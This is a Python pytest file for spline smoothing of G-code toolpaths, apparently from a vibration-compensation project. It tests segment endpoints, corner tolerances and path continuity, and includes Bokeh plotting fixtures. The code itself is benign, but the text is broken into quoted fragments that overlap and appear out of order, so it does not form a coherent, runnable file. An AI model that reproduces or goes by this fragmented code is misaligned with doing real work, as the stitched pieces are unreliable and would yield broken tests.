"Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\" ],",
"the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg",
"np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"\"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data,",
"0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and",
"else: assert False, \"Invalid start type\" if start == \"start\" and end ==",
"s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length",
"line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5)",
"== self.spline_start, \\ \"The previous segment does not end where the current one",
"np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100,",
"self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg",
"start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert",
"generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start point of the",
"== \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if start == \"start\"",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0",
"\"The end point of the spline segment is not on the line\" def",
"this line is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3,",
"p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" )",
"not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def",
"segment does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert",
"start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths)",
"def __init__(self,data, l, s, start, end, corner): self.data = data self.s = s",
"spline segment is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg)",
"start, end): checker = SegmentChecker(data, l, s, start, end, False) if start ==",
"end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1,",
"0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment does",
"end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1:",
"data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid",
"start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) )",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def",
"0.5) def check_point_on_line(self): msg = \"The middle point of the spline segment is",
"\"The end point of the spline segment is not on the middle of",
"= data self.s = s self.start = start self.end = end self.start_point =",
"= \"The start point of the spline segment is not on the line\"",
"np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data)",
"straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4,",
"self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous",
"X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300",
"self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The",
"is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12),",
"msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point of the spline",
"the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def",
"X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1,",
"one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) ==",
"0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) +",
"start distance does not match\" if line <= 1.0: line_dist = self.start_line_dist +",
"self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start point",
"Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid",
"self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end point",
"figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb",
"if end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end ==",
"data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1]",
"\"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data,",
"check_distance(self, spline, line): msg = \"The spline start distance does not match\" if",
"\"The end point of the spline segment does not match the line end",
"data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s]",
"abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data)",
"np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\",",
"def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def",
"- self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid))",
"= generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"= np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist =",
"abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20",
"assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point of",
"\\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance and the current segment",
"self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start point of the",
"SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data = data self.s =",
"\"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\"",
"self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0",
"pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1",
"is very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\")",
"checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start == \"on\":",
"2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l]",
"\"G1 X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg",
"start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert",
"(line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg",
"assert False, \"Invalid start type\" if start == \"start\" and end == \"end\":",
"+ 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid",
"X10 Y0\", \"G1 X20 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"spline segment is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point,",
"= self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline)",
"s=3, start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert",
"np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1])",
"np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data",
"start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert",
"generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])",
"a discontinuity at the end of the spline segment\" if self.s > 0:",
"= read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p",
"\"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 +",
"def check_distance(self, spline, line): msg = \"The spline start distance does not match\"",
"300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data =",
"== \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def",
"is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\",
"\\ \"The previous segment does not end where the current one starts\" assert_array_almost_equal(self.spline(self.spline_start-1e-12),",
"Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1:",
"== \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start",
"np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist",
"SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline segment is not on",
"assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\",",
"5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1,",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data)",
"end_error_segment_middle = \"The end point of the spline segment is not on the",
"maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p = plt.Figure(",
"l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:,",
"def check_start_point_on(self): msg = \"The start point of the spline segment is not",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def",
"\\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\",",
"data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1]",
"self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start,",
"= \"The closest point of the corner is not close enough\" def check_corner_middle_normal(self):",
"or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif",
"< 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 1]),",
"Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def",
"\"The endpoint of the corner spline is before the line segment end\" corner_error",
"type\" if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if",
"of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5)",
"start point of the spline segment is not on the middle of the",
"def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30",
"segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0)",
"linea) * 0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data,",
"assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The",
"X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea -",
"def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01)",
"10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"= generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\"",
"+ np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data)",
"point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg =",
"sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path",
"0) def check_start_point_on(self): msg = \"The start point of the spline segment is",
"the spline segment is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point,",
"pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point of",
"data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy,",
"\"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else:",
"0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def",
"np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point -",
"start, end): checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if start",
"100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3,",
"0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts =",
"start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20,",
"X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0,",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter):",
"does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment",
"points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point): return",
"data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ],",
"assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg =",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter):",
"spline segment is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end))",
"np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data)",
"import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path, filename",
"match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of the",
"def check_end_point_end(self): msg = \"The end point of the spline segment does not",
"self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the spline segment",
"== pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end point of the",
"200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([",
"1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts)",
"def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01)",
"abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity at the",
"corner_error = \"The closest point of the corner is not close enough\" def",
"assert_array_almost_equal(self.spline(self.spline_start-1e-12), self.spline(self.spline_start), err_msg=msg) assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start),",
"l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\",",
"return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000,",
"s, start, end, False) if start == \"start\": checker.check_start_point_start() elif start == \"on\":",
"250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:,",
"= data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy -",
"\\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data",
"abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker =",
"pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point of the spline",
"\"Invalid end type\" checker.check_continuity() def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0,",
"corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"of the spline segment is not on the middle of the line\" assert",
"+ \".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data =",
"start do not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The",
"point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) * 0.5 + linea return",
"Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") straight_segment(data,",
"s, start, end): checker = SegmentChecker(data, l, s, start, end, False) if start",
"data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" )",
"assert self.spline.distance(self.spline_start-1e-12) <=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The",
"assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\",",
"< 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]),",
"start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data,",
"l, s, start, end, False) if start == \"start\": checker.check_start_point_start() elif start ==",
"np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20,",
"as plt @pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\")",
"data.smoothed_toolpath(ts) p.line( points[:,0], points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\"",
"plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1",
"self.start = start self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if",
"np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self):",
"assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\",",
"\"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\":",
"== \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter):",
"short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2,",
"the spline segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg)",
